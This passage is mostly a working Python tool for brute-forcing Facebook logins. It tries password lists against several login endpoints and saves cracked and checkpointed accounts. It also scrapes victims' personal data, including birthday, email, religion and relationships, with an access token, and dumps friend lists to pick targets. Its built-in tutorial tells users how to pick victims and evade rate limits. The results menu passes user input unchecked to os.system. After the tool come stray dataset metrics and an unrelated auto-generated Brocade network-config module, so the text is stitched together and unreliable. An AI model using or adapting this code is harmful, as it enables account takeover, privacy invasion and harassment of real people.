                log = log_api(fl.get("id"),
                    i,"https://b-api.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id"))))
                    print("")
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.api_opsi(fl)
    def mbasic(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_mbasic(fl.get("id"),
                    i,"https://mbasic.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-OK%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.mbasic(fl)
    def mbasic_opsi(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_mbasic(fl.get("id"),
                    i,"https://mbasic.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        h_cp = "\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id")))
                        cek_log(fl.get("id"),i,h_cp)
                        print("")
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    h_cp = "\r%s[%sMARK-OK%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id")))
                    cek_log(fl.get("id"),i,h_cp)
                    print("")
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-OK%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    print("")
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.mbasic_opsi(fl)
    def free(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_free(fl.get("id"),
                    i,"https://free.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        print("\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id"))))
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    print("\r%s[%sMARK-CP%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id"))))
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-OK%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.free(fl)
    def free_opsi(self,fl):
        try:
            for i in fl.get("pw"):
                log = log_free(fl.get("id"),
                    i,"https://free.facebook.com")
                if log.get("status")=="cp":
                    try:
                        ke = requests.get("https://graph.facebook.com/" + fl.get("id") + "?access_token=" + open("token.txt","r").read())
                        tt = json.loads(ke.text)
                        ttl = tt["birthday"]
                        m,d,y = ttl.split("/")
                        m = bulan_ttl[m]
                        h_cp = "\r%s[%sMARK-CP%s] %s • %s • %s %s %s%s"%(O,P,O,fl.get("id"),i,d,m,y,tahun(fl.get("id")))
                        cek_log(fl.get("id"),i,h_cp)
                        print("")
                        self.cp.append("%s•%s•%s%s%s"%(fl.get("id"),i,d,m,y))
                        open("CP/%s.txt"%(tanggal),"a+").write("%s•%s•%s%s%s\n"%(fl.get("id"),i,d,m,y))
                        break
                    except(KeyError, IOError):
                        m = " "
                        d = " "
                        y = " "
                    except:pass
                    h_cp = "\r%s[%sMARK-OK%s] %s • %s%s     "%(O,P,O,fl.get("id"),i,tahun(fl.get("id")))
                    cek_log(fl.get("id"),i,h_cp)
                    print("")
                    self.cp.append("%s•%s"%(fl.get("id"),i))
                    open("CP/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                elif log.get("status")=="success":
                    h_ok = "\r%s[%sMARK-CP%s] %s • %s%s%s     "%(H,P,H,fl.get("id"),i,tahun(fl.get("id")),P)
                    cek_apk(h_ok,koki(log.get("cookies")))
                    print("")
                    self.ada.append("%s•%s"%(fl.get("id"),i))
                    open("OK/%s.txt"%(tanggal),"a+").write("%s•%s\n"%(fl.get("id"),i))
                    break
                else:continue
                    
            self.ko+=1
            print("\r%s[%sCrack%s][%s%s/%s%s][%sOK:%s%s][%sCP:%s%s]%s"%(O,P,O,P,self.ko,len(self.fl),O,P,len(self.ada),O,P,len(self.cp),O,P), end=' ');sys.stdout.flush()
        except:
            self.free_opsi(fl)
def target():
    try:token = open('token.txt','r').read()
    except (KeyError,IOError):jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P));menu_log()
    idt = input("%s╠══[%s•%s] %sID Target : "%(O,P,O,P))
    try:
        zx = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token);zy = json.loads(zx.text)
    except (KeyError,IOError):jalan('%s╚══[%s!%s] %sID Not Found'%(M,P,M,P));menu()
    try:nm = zy["name"]
    except (KeyError,IOError):nm = ("-")
    try:nd = zy["first_name"]
    except (KeyError,IOError):nd = ("-")
    try:nt = zy["middle_name"]
    except (KeyError,IOError):nt = ("-")
    try:nb = zy["last_name"]
    except (KeyError,IOError):nb = ("-")
    try:ut = zy["birthday"]
    except (KeyError,IOError):ut = ("-")
    try:gd = zy["gender"]
    except (KeyError,IOError):gd = ("-")
    try:em = zy["email"]
    except (KeyError,IOError):em = ("-")
    try:lk = zy["link"]
    except (KeyError,IOError):lk = ("-")
    try:us = zy["username"]
    except (KeyError,IOError):us = ("-")
    try:rg = zy["religion"]
    except (KeyError,IOError):rg = ("-")
    try:rl = zy["relationship_status"]
    except (KeyError,IOError):rl = ("-")
    try:rls = zy["significant_other"]["name"]
    except (KeyError,IOError):rls = ("-")
    try:lc = zy["location"]["name"]
    except (KeyError,IOError):lc = ("-")
    try:ht = zy["hometown"]["name"]
    except (KeyError,IOError):ht = ("-")
    try:ab = zy["about"]
    except (KeyError,IOError):ab = ("-")
    try:lo = zy["locale"]
    except (KeyError,IOError):lo = ("-")
    jalan('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,nm))
    jalan('%s╠══[%s•%s] %sFirst name : %s'%(O,P,O,P,nd))
    jalan('%s╠══[%s•%s] %sMiddle name : %s'%(O,P,O,P,nt))
    jalan('%s╠══[%s•%s] %sLast name : %s'%(O,P,O,P,nb))
    jalan('%s╠══[%s•%s] %sTTL : %s'%(O,P,O,P,ut))
    jalan('%s╠══[%s•%s] %sGender : %s'%(O,P,O,P,gd))
    jalan('%s╠══[%s•%s] %sEmail : %s'%(O,P,O,P,em))
    jalan('%s╠══[%s•%s] %sLink : %s'%(O,P,O,P,lk))
    jalan('%s╠══[%s•%s] %sUsername : %s'%(O,P,O,P,us))
    jalan('%s╠══[%s•%s] %sReligion : %s'%(O,P,O,P,rg))
    jalan('%s╠══[%s•%s] %sStatus Hubungan : %s'%(O,P,O,P,rl))
    jalan('%s╠══[%s•%s] %sRelationship With : %s'%(O,P,O,P,rls))
    jalan('%s╠══[%s•%s] %sResidence : %s'%(O,P,O,P,lc))
    jalan('%s╠══[%s•%s] %sPlace of Origin : %s'%(O,P,O,P,ht))
    jalan('%s╠══[%s•%s] %sAbout : %s'%(O,P,O,P,ab))
    jalan('%s╠══[%s•%s] %sLocale : %s'%(O,P,O,P,lo))
    print('%s║'%(O))
    input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
    menu()
def teman_target():
    it = input('%s╠══[%s•%s] %sID Target : '%(O,P,O,P))
    try:
        token = open('token.txt','r').read()
        mm = requests.get('https://graph.facebook.com/%s?access_token=%s'%(it,token))
        nn = json.loads(mm.text)
        print ('%s╠══[%s•%s] %sName : %s'%(O,P,O,P,nn['name']))
    except (KeyError,IOError):
        jalan('%s╚══[%s!%s] %sToken/Cookies Invalid'%(M,P,M,P))
        menu_log()
    tt=[]
    te=[]
    lim = input('%s╠══[%s•%s] %sLimit Dump : '%(O,P,O,P))
    print('%s║%s'%(O,P))
    ada = requests.get('https://graph.facebook.com/%s/friends?limit=%s&access_token=%s'%(it,lim,token))
    idi = json.loads(ada.text)
    for x in idi['data']:
        tt.append(x['id'])
    for id in tt:
        try:
            ada2 = requests.get('https://graph.facebook.com/%s/friends?access_token=%s'%(id,token))
            idi2 = json.loads(ada2.text)
            try:
                for b in idi2['data']:
                    te.append(b['id'])
            except KeyError:
                print('╠══[!] Private')
            print('╠══[•]',id,'•',len(te))
            te.clear()
        except KeyError:
            print('╠══[!] Spam Accounts')
    print('║')
    input('╚══[ Return ]')
    menu()
def hasil():
    clear()
    banner()
    jalan('%s╔══[ %sCrack Results %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sCheck Result OK'%(O,P,O,P))
    print('%s╠══[%s2%s] %sCheck result CP'%(O,P,O,P))
    ch = input('%s╠══[%s•%s] %sChoose : '%(O,P,O,P))
    if ch in ['']:
        jalan('%s╚══[%s!%s] %sIsi Yang Benar'%(M,P,M,P))
        menu()
    elif ch in ['1','01','001','a']:
        try:
            okl = os.listdir("OK")
            print('%s║'%(O))
            print('%s╠══[%s Crack Results Stored in File OK%s]'%(O,P,O))
            print('%s║'%(O))
            for file in okl:
                print('%s╠══[%s•%s] %s%s'%(O,P,O,P,file))
            print('%s║'%(O))
            files = input('%s╚══[%s•%s] %sEnter File Name : '%(O,P,O,P))
            print('')
            if files == "":
                jalan('%s═══[%s!%s] %sCorrect Content'%(M,P,M,P))
                hasil()
            os.system('cat OK/%s'%(files))
            ppp = open("OK/%s"%(files)).read().splitlines()
            del1 = ("%s"%(files)).replace("-", " ").replace(".txt", "")
            print('\n%s╔══[%s•%s] %sTotal Crack Result Date %s is %s Account'%(O,P,O,P,del1,len(ppp)))
        except (KeyError,IOError):
            print('%s╠══[%s No Results Found %s]'%(M,P,M))
    elif ch in ['2','02','002','b']:
        try:
            cpl = os.listdir("CP")
            print('%s║'%(O))
            print('%s╠══[%s Crack Results Stored in CP Files %s]'%(O,P,O))
            print('%s║'%(O))
            for file in cpl:
                print('%s╠══[%s•%s] %s%s'%(O,P,O,P,file))
            print('%s║'%(O))
            files = input('%s╚══[%s•%s] %sEnter File Name : '%(O,P,O,P))
            print('')
            if files == "":
                jalan('%s═══[%s!%s] %sCorrect Content'%(M,P,M,P))
                hasil()
            os.system('cat CP/%s'%(files))
            ppp = open("CP/%s"%(files)).read().splitlines()
            del1 = ("%s"%(files)).replace("-", " ").replace(".txt", "")
            print('\n%s╔══[%s•%s] %sTotal Crack Result Date %s is %s Account'%(O,P,O,P,del1,len(ppp)))
        except (KeyError,IOError):
            print('%s╠══[%s No Results Found %s]'%(M,P,M))
    else:
        jalan('%s╚══[%s!%s] %sCorrect Content'%(M,P,M,P))
        menu()
    print('%s║'%(O))
    input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
    menu()
def log_hasil(user, pasw):
    ua = "Mozilla/5.0 (Linux; Android 11; vivo 1904 Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36"
    ses = requests.Session()
    ses.headers.update({
    "Host": "mbasic.facebook.com",
    "cache-control": "max-age=0",
    "upgrade-insecure-requests": "1",
    "origin": host,
    "content-type": "application/x-www-form-urlencoded",
    "user-agent": ua,
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "x-requested-with": "mark.via.gp",
    "sec-fetch-site": "same-origin",
    "sec-fetch-mode": "navigate",
    "sec-fetch-user": "?1",
    "sec-fetch-dest": "document",
    "referer": host+"/login/?next&ref=dbl&fl&refid=8",
    "accept-encoding": "gzip, deflate",
    "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
    })
    data = {}
    ged = par(ses.get(host+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{"method":"post"})
    list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in list:
            data.update({i.get("name"):i.get("value")})
        else:
            continue
    data.update({"email":user,"pass":pasw})
    try:
        run = par(ses.post(host+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    except requests.exceptions.TooManyRedirects:
        print("%s[%s!%s] %sSpam Accounts"%(M,P,M,P))
    if "c_user" in ses.cookies:
        print("%s[%s•%s] %sAccount OK No Checkpointt"%(H,P,H,P))
    elif "checkpoint" in ses.cookies:
        form = run.find("form")
        dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
        jzst = form.find("input",{"name":"jazoest"})["value"]
        nh   = form.find("input",{"name":"nh"})["value"]
        dataD = {
            "fb_dtsg": dtsg,
            "fb_dtsg": dtsg,
            "jazoest": jzst,
            "jazoest": jzst,
            "checkpoint_data":"",
            "submit[Continue]":"Lanjutkan",
            "nh": nh
        }
        xnxx = par(ses.post(host+form["action"], data=dataD).text, "html.parser")
        ngew = [yy.text for yy in xnxx.find_all("option")]
        if(str(len(ngew))=="0"):
            print("%s[%s•%s] %sOne Tap Account"%(H,P,H,P))
        else:
            print("%s[%s•%s] %sThereis %s Option "%(O,P,O,P,str(len(ngew))))
        for opt in range(len(ngew)):
            print(" "*3, str(opt+1)+". "+ngew[opt])
    elif "login_error" in str(run):
        oh = run.find("div",{"id":"login_error"}).find("div").text
        print("%s[%s!%s] %s%s"%(M,P,M,P,oh))
    else:
        print("%s[%s!%s] %sPassword Has Changed"%(M,P,M,P))
def cek_hasil():
    jalan('%s╠══[ %sCheck Crack Result Account Options %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sExample File : CP/%s.txt'%(O,P,O,P,tanggal))
    files = input('%s╠══[%s•%s] %sFile : '%(O,P,O,P))
    try:
        buka_baju = open(files,"r").readlines()
    except FileNotFoundError:
        print("%s╚══[%s!%s] %sFile Not Existing"%(M,P,M,P))
        time.sleep(2); cek_hasil()
    print("%s╚══[%s•%s] %sNumber of Accounts : %s"%(O,P,O,P,str(len(buka_baju))))
    print("")
    for memek in buka_baju:
        kontol = memek.replace("\n","")
        titid  = kontol.split("•")
        print("%s[%s•%s] %sCheck Login : %s"%(O,P,O,P,kontol))
        try:
            log_hasil(titid[0], titid[1])
        except requests.exceptions.ConnectionError:
            continue
        print("")
    print("")
    print('%s╔══[%s•%s] %s Checking Process Complete'%(O,P,O,P))
    print('%s║'%(O))
    input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
    menu()
def var_menu():
    print('%s╔══[ %sSelect Method Login %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sLogin with Token'%(O,P,O,P))
    print('%s╠══[%s2%s] %sLogin with Cookies'%(O,P,O,P))
    print('%s╠══[%s3%s] %sScript Usage Tutorial'%(O,P,O,P))
    print('%s╠══[%s4%s] %sInfo Author & Team Project'%(O,P,O,P))
    print('%s╠══[%s0%s] %sGo Back'%(O,P,O,P))
def var_tutor():
    mlaku('%s╔══[%s Tips & Tutorial %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sHow to Take Token'%(O,P,O,P))
    print('%s╠══[%s2%s] %sHow to Take Cookies'%(O,P,O,P))
    print('%s╠══[%s3%s] %sHow to Get Target'%(O,P,O,P))
    print('%s╠══[%s4%s] %sWays During the Crack Process'%(O,P,O,P))
def tutor_target():
    mlaku('%s╠═══╦══════════════════════════════════════════════════════╗'%(O))
    mlaku('%s║ %s1 %s║ %sPrepare a Sacrificial Account In Chrome For Cracking Process %s║'%(O,P,O,P,O))
    mlaku('%s║ %s2 %s║ %sChange the Victim Account Password First          %s║'%(O,P,O,P,O))
    mlaku('%s║ %s3 %s║ %sFind Random Account Targets, Friends List Must Be Public   %s║'%(O,P,O,P,O))
    mlaku('%s║ %s4 %s║ %sFriends (FL) Free, Can be 1K, 2K, 3K, ,4K, Or 5K      %s║'%(O,P,O,P,O))
    mlaku('%s║ %s5 %s║ %sMore Friends, More Possible Results  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s6 %s║ %sTap Target Profile/Cover Photo                      %s║'%(O,P,O,P,O))
    mlaku('%s║ %s7 %s║ %ssee URL/Link Above, There is \ id = 10001xx\ %s║'%(O,P,O,P,O))
    mlaku('%s║ %s8 %s║ %sWell, thats a target ID ready to crack   %s║'%(O,P,O,P,O))
    mlaku('%s║ %s9 %s║ %sOpen Termux/Linux then proceed to the Crack Process %s║'%(O,P,O,P,O))
    mlaku('%s╠═══╩══════════════════════════════════════════════════════╝'%(O))
    print('%s║'%(O))
def tutor_crack():
    mlaku('%s╠═══╦══════════════════════════════════════════════════════╗'%(O))
    mlaku('%s║ %s1 %s║ %sMethod Api : Fast But Easy Process Spam            %s║'%(O,P,O,P,O))
    mlaku('%s║ %s2 %s║ %sMethod Mbasic : The process is quite fast, rarely spammed  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s3 %s║ %sMethod Mobile : Slow Process, Probably OK  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s4 %s║ %sCrack Using Data Quota (Not Support Wifi)  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s5 %s║ %sIf Results Do Not Appear While The Crack Is Running       %s║'%(O,P,O,P,O))
    mlaku('%s║ %s6 %s║ %sTurn On Airplane Mode Only 5 Seconds                   %s║'%(O,P,O,P,O))
    mlaku('%s╠═══╩══════════════════════════════════════════════════════╝'%(O))
    print('%s║'%(O))
def var_author():
    mlaku('%s╔══[ %sAuthor & Team Project %s]'%(O,P,O))
    mlaku('%s║'%(O))
    mlaku('%s╠══[%s•%s] %sAuthor :'%(O,P,O,P))
    mlaku('%s║     • %sMARK'%(O,P))
    mlaku('%s║     • %sOFONCITI'%(O,P))
    mlaku('%s║'%(O))
    mlaku('%s╠══[%s•%s] %sTeam Project %sMARK TECHNOLOGY%s :'%(O,P,O,P,O,P))
    mlaku('%s║     • %sMARK'%(O,P))
    mlaku('%s║     • %sDAVOLA'%(O,P))
    mlaku('%s║     • %sJEWEL'%(O,P))
    mlaku('%s║     • %sOFONCITY '%(O,P))
    mlaku('%s║     • %sPRINCE'%(O,P))
    mlaku('%s║     • %sENOCH'%(O,P))
    mlaku('%s║     • %sRAJAT'%(O,P))
    mlaku('%s║     • %sDAMMY'%(O,P))
    mlaku('%s║     • %sUDUAK'%(O,P))
    mlaku('%s║     • %sFLEMZY'%(O,P))
    mlaku('%s║     • %sMIRACEL'%(O,P))
    mlaku('%s║     • %sFOREGNER'%(O,P))
    mlaku('%s║'%(O))
def var_ugen():
    print("%s╠══[%s1%s] %sGet User Agent"%(O,P,O,P))
    print("%s╠══[%s2%s] %sChange User Agent%s(%sManual%s)"%(O,P,O,P,O,P,O))
    print("%s╠══[%s3%s] %sChange User Agent %s(%sAdjust HP%s)"%(O,P,O,P,O,P,O))
    print("%s╠══[%s4%s] %sDelete User Agent"%(O,P,O,P))
    print("%s╠══[%s5%s] %sCheck User Agent"%(O,P,O,P))
    print("%s╠══[%s0%s] %sReturn"%(O,P,O,P))
def start_method():
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sMethod Api'%(O,P,O,P))
    print('%s╠══[%s2%s] %sMethod Mbasic'%(O,P,O,P))
    print('%s╠══[%s3%s] %sMethod Free FB'%(O,P,O,P))
def start_methodezz():
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sFast Crack %s[%s6 pass%s]'%(O,P,O,P,O,P,O))
    print('%s╠══[%s2%s] %sSlow Crack %s[%s9 pass%s]'%(O,P,O,P,O,P,O))
    print('%s╠══[%s3%s] %sVery Slow Crack %s[%s12 pass%s]'%(O,P,O,P,O,P,O))
    print('%s╠══[%s4%s] %sCrack Password Combine'%(O,P,O,P))
def started():
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sCrack Is Running...'%(O,P,O,P))
    print('%s╠══[%s•%s] %sAccount [OK] Saved To OK/%s.txt'%(O,P,O,P,tanggal))
    print('%s╠══[%s•%s] %sAccount [CP] Saved To CP/%s.txt'%(O,P,O,P,tanggal))
    print('%s╚══[%s•%s] %sActivate Airplane Mode [5 Seconds Only] Every 5 Minutes\n'%(O,P,O,P))
def folder():
    try:os.mkdir("CP")
    except:pass
    try:os.mkdir("OK")
    except:pass
if __name__=='__main__':
  os.system('git pull')
  folder()
  menu()
# Mau Ngapain Cuk?
"))"))"))"))
| 122,160
| 244,306
| 0.999955
| 6
| 244,320
| 40,718.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091238
| 0.000008
| 244,320
| 2
| 244,306
| 122,160
| 0.908726
| 0
| 0
| 0
| 0
| 0
| 0.999832
| 0.999832
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
7c2de04bcc0b1be14c4e2eed0ff82a7a01133232
| 84,902
|
py
|
Python
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_threshold_monitor.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 12
|
2015-09-21T23:56:09.000Z
|
2018-03-30T04:35:32.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_threshold_monitor.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 10
|
2016-09-15T19:03:27.000Z
|
2017-07-17T23:38:01.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_threshold_monitor.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 6
|
2015-08-14T08:05:23.000Z
|
2022-02-03T15:33:54.000Z
|
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_threshold_monitor(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def threshold_monitor_hidden_threshold_monitor_sfp_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
apply = ET.SubElement(sfp, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
pause = ET.SubElement(sfp, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name = ET.SubElement(policy, "policy_name")
policy_name.text = kwargs.pop('policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
type = ET.SubElement(area, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
